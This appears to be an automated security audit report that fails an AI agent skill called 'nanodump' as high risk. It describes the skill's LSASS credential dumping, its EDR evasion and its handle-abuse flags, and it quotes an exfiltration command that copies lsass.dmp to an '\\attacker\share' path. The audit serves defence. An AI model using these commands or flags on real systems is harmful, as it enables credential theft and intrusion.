nanodump
Fail
Audited by Gen Agent Trust Hub on Sep 15, 2026
Risk Level: HIGHCREDENTIALS_UNSAFEDATA_EXFILTRATIONPRIVILEGE_ESCALATIONCOMMAND_EXECUTION
Full Analysis
- [CREDENTIALS_UNSAFE]: The skill facilitates the acquisition of LSASS process memory, which is a primary source of Windows credentials, including NTLM hashes and cleartext passwords.
- Evidence includes instructions for parsing dumps with Mimikatz and pypykatz to extract sensitive authentication data.
- [DATA_EXFILTRATION]: The skill documents specific methods for moving harvested credential dumps to external systems.
- Evidence includes commands for transferring files via SMB shares (
copy lsass.dmp \\attacker\share\) and downloading files through Command & Control (C2) frameworks like Cobalt Strike. - [PRIVILEGE_ESCALATION]: The instructions describe methods for manipulating system handles and accessing the LSASS process, which requires high-level administrative or SYSTEM privileges.
- Evidence includes the use of flags like
--elevate-handle,--dup, and--sec-logonto abuse existing handles or secondary logon services. - [COMMAND_EXECUTION]: The skill provides precise command-line arguments for executing binaries designed to evade Endpoint Detection and Response (EDR) solutions.
- Evidence includes the implementation of direct syscalls, forking techniques, and silent process exit mechanisms to bypass monitoring and security hooks.
Recommendations
- AI detected serious security threats
Audit Metadata